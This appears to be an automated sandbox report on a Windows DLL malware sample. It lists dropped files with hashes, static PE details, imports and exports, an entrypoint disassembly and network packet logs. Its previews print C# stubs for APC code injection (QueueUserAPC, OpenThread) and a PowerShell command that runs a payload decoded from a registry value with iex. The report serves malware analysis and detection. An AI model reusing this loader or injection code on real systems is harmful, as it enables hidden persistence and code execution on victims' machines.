                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):351
                                                          Entropy (8bit):5.301069111144844
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fX8Vzxs7+AEszIWXp+N23fX8Qn:p37Lvkmb6KHP8VWZE8P8Q
                                                          MD5:0B98006696980210E9096059C632C9B8
                                                          SHA1:BA33540895DF323BB1D30D55441736656F52DD5A
                                                          SHA-256:3E717303B58E2B14894912390DE05081D1807884B29A6C570C69FE8F34AC8FB0
                                                          SHA-512:986EE52DEF241BA94C9D44E5D1CE8DED5DEF73E1CFB6E02841BF15884B1391CDB7E222F8D4178ECCD224787064F6FCD6DE3ECC96AF33A2D09C66975483A2080A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hjljqxud.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hjljqxud.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\hjljqxud.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.6196876679200796
                                                          Encrypted:false
                                                          SSDEEP:24:etGSN8+mEej8MTHtmCFxidWptkZfOBvPat60hEdI+ycuZhNUakSgPNnq:6DLjMTwCFxcWkJOlSt66Ed1ulUa34q
                                                          MD5:AB4597E9782631B17D2198E76172A529
                                                          SHA1:F1A1CEB3F77BC49D50D7D19C1BCB735D371F42A4
                                                          SHA-256:4B834FFE906C310F0F47401E4533440FABEE3F0CEC9B9226E8DF0CFAFCC0972A
                                                          SHA-512:A3E2C980FF718E6028215F79235A9C69CBDA0817163F1C98E32F79A6303A28C1A2C434A19F1DB94A5E46D4CC377173D96806A49B728E1C62D2344BB04D9368A6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....K`a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................0.)...................................................... 7............ I............ Q.....P ......`.........f.....j.....p.....|.....................`.!...`...!.`.&...`.......+.....4.1.....7.......I.......Q....................................... ..........<Module>.hjljqxud.dll.yykg.W32.msco
                                                          C:\Users\user\AppData\Local\Temp\hjljqxud.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
                                                          Entropy (8bit):4.871364761010112
                                                          Encrypted:false
                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          C:\Users\user\AppData\Local\Temp\uio4qdnj.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):415
                                                          Entropy (8bit):5.038565598056225
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJ0mMRSR7a18lpP6tkSRa+rVSSRnA/fl81N4IkgsOFQy:V/DTLDfuCMLh6tv9rV5nA/61N43gszy
                                                          MD5:820D67D86E4D2F141C62A2F02F457875
                                                          SHA1:0F597E389BE20591567742E9333D19419947B3CD
                                                          SHA-256:0DECFD511470CAB8EF7D4A45A891B8D3C8A7ABA782190C2777E2A2048F82A3CD
                                                          SHA-512:B05C022573C3EA6D9BC39C6E6E38DD33EC63D55F9793E6F5367E1EBA8493C33FFA28EB5989881EC82EE898F117D616FD1FE2A68E7FBF345209E8A61CBBFCCB61
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class nrahxbk. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr bjvmnbdtfa,IntPtr tvxroymffj,IntPtr xig);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint bbqximxsfm,uint leqlyn,IntPtr axhxmnupohp);.. }..}.
                                                          C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):351
                                                          Entropy (8bit):5.268750609128095
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23f9KHzxs7+AEszIWXp+N23f9KoyA:p37Lvkmb6KHl0WZE8lz9
                                                          MD5:49F0BD0679BF1D1C64609BEC9FF0E9A8
                                                          SHA1:891088F1D52E4CBA1FC00275C138412B721B3AA9
                                                          SHA-256:4850FD4D357E5351C8262D82A388985B2B2B981B101052EB731D5B5D26BF8A98
                                                          SHA-512:3DCCB541CD36CCD5AC5537E7E3843E158760817BACE3C8BBABF6CF7BAB13CDE2EE95AC1DC3FB4A442FFE855502004AA92246FD912E4E118BA5723AA85E1592DA
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\uio4qdnj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uio4qdnj.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\uio4qdnj.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.6373866366749064
                                                          Encrypted:false
                                                          SSDEEP:48:6Im65J7+ikLLuu0SJmUqgX1uljua36tq:Q65J7yLhhIpuK6
                                                          MD5:97E33B4529706F244A7CC47FEF8277AE
                                                          SHA1:947DC04DF356F47448FC32D5EE745596473B0F59
                                                          SHA-256:E0C3FB85273C41F45A2A3DF4ADECFBAF8C3A69DA3255A2E3065026F3EFB2CA15
                                                          SHA-512:49366788F7963F742735F04691E4EFC9427CBED09B7B9883B599CFABFBF2E47303B21B2D4D555596334C5D394BAED8289B7DD848798C0F71502AA2263B2A297E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....K`a...........!.................$... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......H...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................3.,...............)...................................... :............ G............ Z.....P ......e.........k.....v...........................e. ...e...!.e.%...e.......*.....3.<.....:.......G.......Z.......................................#........<Module>.uio4qdnj.dll.nrahxbk.W32.mscorlib.
                                                          C:\Users\user\AppData\Local\Temp\uio4qdnj.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
                                                          Entropy (8bit):4.871364761010112
                                                          Encrypted:false
                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          C:\Users\user\Documents\20211008\PowerShell_transcript.830021.xU5QnXMG.20211008064622.txt
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1195
                                                          Entropy (8bit):5.320686932671721
                                                          Encrypted:false
                                                          SSDEEP:24:BxSAIxvBnD+x2DOXUWOLCHGI4XWrHjeTKKjX4CIym1ZJXWOLCHGI4SnxSAZn:BZcvhKoORF4GrqDYB1ZcF4UZZn
                                                          MD5:8AF4A446FD74F106B3927FD02E153053
                                                          SHA1:0C5A039AC8E3712945A48112494E3209ED7F619A
                                                          SHA-256:29DA2D3F7E72FFC0EAE80A9BE479BFA51450B70D9E0F7EC3B4090A3603E2B1AD
                                                          SHA-512:60EC0EE0ACD4EBD70CDD3BB2277D456169A9DF53A8D0B13855F46F0DB97DEBD13ED9E6B0D738900E7C094CB3F3F210CA1ADDA1E834B08C63996A0953448FCF25
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20211008064622..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 830021 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 5480..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211008064622..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..******************
                                                          C:\Users\user\Documents\20211008\PowerShell_transcript.830021.xd8ptVim.20211008064618.txt
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1195
                                                          Entropy (8bit):5.322193987487182
                                                          Encrypted:false
                                                          SSDEEP:24:BxSAdxvBnD+x2DOXUWOLCHGI4XWetHjeTKKjX4CIym1ZJXPOLCHGI4znxSAZS:BZ/vhKoORF4G8qDYB1Z/F4TZZS
                                                          MD5:8E619B398098C24D77705A3469300C9C
                                                          SHA1:25DFE5320E20672519A43CF9C45E1B8FF38CBD4D
                                                          SHA-256:60B3C46DFE1B6F20597588DA9B4ACB49651019D3CAEBD9015EC86158D392C6E1
                                                          SHA-512:6213A342205E2AB3285F6957EFF5620C1E2EAB02D2E0DFAC335C7833709DB80714DC93E913E451C93797C985D1AF9F8C6FB7BE01EE7A06CB637E6C8FE43175F9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20211008064618..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 830021 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 6972..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211008064618..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..******************

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):5.437180554827025
                                                          TrID:
                                                          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                          • Generic Win/DOS Executable (2004/3) 0.20%
                                                          • DOS Executable Generic (2002/1) 0.20%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:uT9rwkGATJ.dll
                                                          File size:662688
                                                          MD5:9a453cc31ebfca29d8df565258fbf8ce
                                                          SHA1:5eb3be88abb84f63e04c92bc3e35a82a01689971
                                                          SHA256:eaed947e04ed7659fbba2287e6965b2c0960035aa539b57a9f9e15504a01ca0a
                                                          SHA512:c916ced5af88b060550b24f1136b5f6e3fde45207cdad721709eb209e706ae40bca9bd230ebf79d83981258ba674993b7f47174f91272358bd5ffe2db40e64b0
                                                          SSDEEP:12288:6vWBEPfqPoo44cvquI2Pg/8wsPrcPgIDU1Iu3vEI8Vck+5gS2oQkoKeyFtseQOYc:6v5Pbo4ZgaPrOpI1IkvIVc1qDoQko/yz
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......SQ...0...0...0..rV...0..rV..j0..rV...0..._...0..._...0....s..0...0..`0..._...0..._...0..._|..0..._...0..Rich.0..........PE..L..

                                                          File Icon

                                                          Icon Hash:74f0e4ecccdce0e4

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x1001f336
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x10000000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                          Time Stamp:0x5F733B58 [Tue Sep 29 13:49:12 2020 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:6
                                                          OS Version Minor:0
                                                          File Version Major:6
                                                          File Version Minor:0
                                                          Subsystem Version Major:6
                                                          Subsystem Version Minor:0
                                                          Import Hash:8d2de2ae605a2294ac6efde10e33795a

                                                          Entrypoint Preview

                                                          Instruction
                                                          push ebp
                                                          mov ebp, esp
                                                          cmp dword ptr [ebp+0Ch], 01h
                                                          jne 00007F2030D59067h
                                                          call 00007F2030D5965Eh
                                                          push dword ptr [ebp+10h]
                                                          push dword ptr [ebp+0Ch]
                                                          push dword ptr [ebp+08h]
                                                          call 00007F2030D58F13h
                                                          add esp, 0Ch
                                                          pop ebp
                                                          retn 000Ch
                                                          push ebp
                                                          mov ebp, esp
                                                          push 00000000h
                                                          call dword ptr [100320BCh]
                                                          push dword ptr [ebp+08h]
                                                          call dword ptr [100320B8h]
                                                          push C0000409h
                                                          call dword ptr [100320C0h]
                                                          push eax
                                                          call dword ptr [100320C4h]
                                                          pop ebp
                                                          ret
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 00000324h
                                                          push 00000017h
                                                          call 00007F2030D69D49h
                                                          test eax, eax
                                                          je 00007F2030D59067h
                                                          push 00000002h
                                                          pop ecx
                                                          int 29h
                                                          mov dword ptr [1009CBC8h], eax
                                                          mov dword ptr [1009CBC4h], ecx
                                                          mov dword ptr [1009CBC0h], edx
                                                          mov dword ptr [1009CBBCh], ebx
                                                          mov dword ptr [1009CBB8h], esi
                                                          mov dword ptr [1009CBB4h], edi
                                                          mov word ptr [1009CBE0h], ss
                                                          mov word ptr [1009CBD4h], cs
                                                          mov word ptr [1009CBB0h], ds
                                                          mov word ptr [1009CBACh], es
                                                          mov word ptr [1009CBA8h], fs
                                                          mov word ptr [1009CBA4h], gs
                                                          pushfd
                                                          pop dword ptr [1009CBD8h]
                                                          mov eax, dword ptr [ebp+00h]
                                                          mov dword ptr [1009CBCCh], eax
                                                          mov eax, dword ptr [ebp+04h]
                                                          mov dword ptr [1009CBD0h], eax

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x9ac200xac.rdata
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x9accc0x50.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x9ae0000x428.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x9af0000x1b80.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x999400x54.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x999980x40.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x320000x1d0.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x30dfc0x30e00False0.680766464194data6.73243552493IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                          .rdata0x320000x696700x69800False0.573033915877data4.48456725744IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0x9c0000x9113280xc00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                          .rsrc0x9ae0000x4280x600False0.287109375data2.49030754887IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x9af0000x1b800x1c00False0.796595982143data6.63506997151IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountry
                                                          RT_VERSION0x9ae0600x3c4dataEnglishUnited States

                                                          Imports

                                                          DLLImport
                                                          KERNEL32.dllGetVolumeInformationW, VirtualProtect, EnterCriticalSection, GetModuleFileNameW, InitializeCriticalSection, GetTempPathW, CreateFileW, GetVersionExW, GetSystemDirectoryW, FindFirstChangeNotificationW, OpenProcess, LockResource, GetCurrentDirectoryW, GetWindowsDirectoryW, GetModuleHandleW, GetSystemTime, QueryPerformanceCounter, GetDateFormatW, WriteConsoleW, CloseHandle, SetFilePointerEx, GetConsoleMode, GetConsoleCP, WriteFile, FlushFileBuffers, SetStdHandle, HeapReAlloc, HeapSize, GetStringTypeW, GetFileType, GetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, WideCharToMultiByte, MultiByteToWideChar, GetCommandLineW, GetCommandLineA, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, EnumSystemLocalesW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, RaiseException, InterlockedFlushSList, GetLastError, SetLastError, EncodePointer, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapFree, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, DecodePointer
                                                          WS2_32.dllgethostbyname, shutdown, WSAStartup, getpeername, getsockname, send, socket, ntohs, getservbyname, recvfrom, recv, htonl, htons, sendto, setsockopt, WSACleanup
                                                          WININET.dllInternetCanonicalizeUrlW, InternetConnectW, InternetGetLastResponseInfoW, InternetCloseHandle, HttpOpenRequestW, InternetOpenW, HttpQueryInfoW, InternetOpenUrlW, InternetQueryDataAvailable, InternetSetOptionExW, InternetCrackUrlW, HttpSendRequestW, InternetSetStatusCallbackW, InternetWriteFile, InternetReadFile

                                                          Exports

                                                          NameOrdinalAddress
                                                          Camptiny10x1001cb80
                                                          Consonantget20x1001ccb0
                                                          LongSubstance30x1001caf0
                                                          Rangetown40x1001cc80
                                                          Scoreplay50x1001ce90
                                                          Visit60x1001cce0

                                                          Version Infos

                                                          DescriptionData
                                                          LegalCopyright Laugh Ranhear person Corporation. All rights reserved
                                                          InternalNameLogice Radiocorner
                                                          FileVersion8.2.6.941
                                                          CompanyNameLaugh Ranhear person Corporation Minescale
                                                          ProductNameLaugh Ranhear person Evenseat Sailmiss
                                                          ProductVersion8.2.6.941
                                                          FileDescriptionLaugh Ranhear person Evenseat Sailmiss
                                                          OriginalFilenameTeach.dll
                                                          Translation0x0409 0x04b0

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 8, 2021 06:45:26.600399971 CEST49754443192.168.2.340.97.156.114
                                                          Oct 8, 2021 06:45:26.600461960 CEST4434975440.97.156.114192.168.2.3
                                                          Oct 8, 2021 06:45:26.600564957 CEST49754443192.168.2.340.97.156.114
                                                          Oct 8, 2021 06:45:26.608392954 CEST49754443192.168.2.340.97.156.114
                                                          Oct 8, 2021 06:45:26.608432055 CEST4434975440.97.156.114192.168.2.3
                                                          Oct 8, 2021 06:45:27.063493967 CEST4434975440.97.156.114192.168.2.3
                                                          Oct 8, 2021 06:45:27.063595057 CEST49754443192.168.2.340.97.156.114
                                                          Oct 8, 2021 06:45:27.068871975 CEST49754443192.168.2.340.97.156.114
                                                          Oct 8, 2021 06:45:27.068896055 CEST4434975440.97.156.114192.168.2.3
                                                          Oct 8, 2021 06:45:27.069401026 CEST4434975440.97.156.114192.168.2.3
                                                          Oct 8, 2021 06:45:27.228650093 CEST49754443192.168.2.340.97.156.114
                                                          Oct 8, 2021 06:45:27.289676905 CEST49754443192.168.2.340.97.156.114
                                                          Oct 8, 2021 06:45:27.335153103 CEST4434975440.97.156.114192.168.2.3
                                                          Oct 8, 2021 06:45:27.438730001 CEST4434975440.97.156.114192.168.2.3
                                                          Oct 8, 2021 06:45:27.438791037 CEST4434975440.97.156.114192.168.2.3
                                                          Oct 8, 2021 06:45:27.438916922 CEST49754443192.168.2.340.97.156.114
                                                          Oct 8, 2021 06:45:27.439054012 CEST49754443192.168.2.340.97.156.114
                                                          Oct 8, 2021 06:45:27.439075947 CEST4434975440.97.156.114192.168.2.3
                                                          Oct 8, 2021 06:45:27.439133883 CEST49754443192.168.2.340.97.156.114
                                                          Oct 8, 2021 06:45:27.439146996 CEST4434975440.97.156.114192.168.2.3
                                                          Oct 8, 2021 06:45:27.464658976 CEST49755443192.168.2.352.98.208.114
                                                          Oct 8, 2021 06:45:27.464709997 CEST4434975552.98.208.114192.168.2.3
                                                          Oct 8, 2021 06:45:27.464792013 CEST49755443192.168.2.352.98.208.114
                                                          Oct 8, 2021 06:45:27.465646982 CEST49755443192.168.2.352.98.208.114
                                                          Oct 8, 2021 06:45:27.465676069 CEST4434975552.98.208.114192.168.2.3
                                                          Oct 8, 2021 06:45:27.563524008 CEST4434975552.98.208.114192.168.2.3
                                                          Oct 8, 2021 06:45:27.563625097 CEST49755443192.168.2.352.98.208.114
                                                          Oct 8, 2021 06:45:27.565572977 CEST49755443192.168.2.352.98.208.114
                                                          Oct 8, 2021 06:45:27.565601110 CEST4434975552.98.208.114192.168.2.3
                                                          Oct 8, 2021 06:45:27.570905924 CEST4434975552.98.208.114192.168.2.3
                                                          Oct 8, 2021 06:45:27.573955059 CEST49755443192.168.2.352.98.208.114
                                                          Oct 8, 2021 06:45:27.601692915 CEST4434975552.98.208.114192.168.2.3
                                                          Oct 8, 2021 06:45:27.601761103 CEST4434975552.98.208.114192.168.2.3
                                                          Oct 8, 2021 06:45:27.601859093 CEST49755443192.168.2.352.98.208.114
                                                          Oct 8, 2021 06:45:27.601986885 CEST49755443192.168.2.352.98.208.114
                                                          Oct 8, 2021 06:45:27.602010965 CEST4434975552.98.208.114192.168.2.3
                                                          Oct 8, 2021 06:45:27.626440048 CEST49756443192.168.2.352.97.151.18
                                                          Oct 8, 2021 06:45:27.626493931 CEST4434975652.97.151.18192.168.2.3
                                                          Oct 8, 2021 06:45:27.626591921 CEST49756443192.168.2.352.97.151.18
                                                          Oct 8, 2021 06:45:27.627329111 CEST49756443192.168.2.352.97.151.18
                                                          Oct 8, 2021 06:45:27.627357006 CEST4434975652.97.151.18192.168.2.3
                                                          Oct 8, 2021 06:45:27.726604939 CEST4434975652.97.151.18192.168.2.3
                                                          Oct 8, 2021 06:45:27.726694107 CEST49756443192.168.2.352.97.151.18
                                                          Oct 8, 2021 06:45:27.728822947 CEST49756443192.168.2.352.97.151.18
                                                          Oct 8, 2021 06:45:27.728843927 CEST4434975652.97.151.18192.168.2.3
                                                          Oct 8, 2021 06:45:27.729233027 CEST4434975652.97.151.18192.168.2.3
                                                          Oct 8, 2021 06:45:27.731389046 CEST49756443192.168.2.352.97.151.18
                                                          Oct 8, 2021 06:45:27.775171041 CEST4434975652.97.151.18192.168.2.3
                                                          Oct 8, 2021 06:45:27.783435106 CEST4434975652.97.151.18192.168.2.3
                                                          Oct 8, 2021 06:45:27.783607006 CEST4434975652.97.151.18192.168.2.3
                                                          Oct 8, 2021 06:45:27.783667088 CEST49756443192.168.2.352.97.151.18
                                                          Oct 8, 2021 06:45:27.783791065 CEST49756443192.168.2.352.97.151.18
                                                          Oct 8, 2021 06:45:27.783809900 CEST4434975652.97.151.18192.168.2.3
                                                          Oct 8, 2021 06:45:27.783845901 CEST49756443192.168.2.352.97.151.18
                                                          Oct 8, 2021 06:45:27.783857107 CEST4434975652.97.151.18192.168.2.3
                                                          Oct 8, 2021 06:45:31.579452991 CEST49764443192.168.2.340.97.160.2
                                                          Oct 8, 2021 06:45:31.579493999 CEST4434976440.97.160.2192.168.2.3
                                                          Oct 8, 2021 06:45:31.579586983 CEST49764443192.168.2.340.97.160.2
                                                          Oct 8, 2021 06:45:31.584486961 CEST49764443192.168.2.340.97.160.2
                                                          Oct 8, 2021 06:45:31.584502935 CEST4434976440.97.160.2192.168.2.3
                                                          Oct 8, 2021 06:45:32.105117083 CEST4434976440.97.160.2192.168.2.3
                                                          Oct 8, 2021 06:45:32.105273962 CEST49764443192.168.2.340.97.160.2
                                                          Oct 8, 2021 06:45:32.108359098 CEST49764443192.168.2.340.97.160.2
                                                          Oct 8, 2021 06:45:32.108381987 CEST4434976440.97.160.2192.168.2.3
                                                          Oct 8, 2021 06:45:32.108710051 CEST4434976440.97.160.2192.168.2.3
                                                          Oct 8, 2021 06:45:32.150989056 CEST49764443192.168.2.340.97.160.2
                                                          Oct 8, 2021 06:45:32.555356026 CEST49764443192.168.2.340.97.160.2
                                                          Oct 8, 2021 06:45:32.599149942 CEST4434976440.97.160.2192.168.2.3
                                                          Oct 8, 2021 06:45:32.725969076 CEST4434976440.97.160.2192.168.2.3
                                                          Oct 8, 2021 06:45:32.726056099 CEST4434976440.97.160.2192.168.2.3
                                                          Oct 8, 2021 06:45:32.730325937 CEST49764443192.168.2.340.97.160.2
                                                          Oct 8, 2021 06:45:32.733315945 CEST49764443192.168.2.340.97.160.2
                                                          Oct 8, 2021 06:45:32.733340025 CEST4434976440.97.160.2192.168.2.3
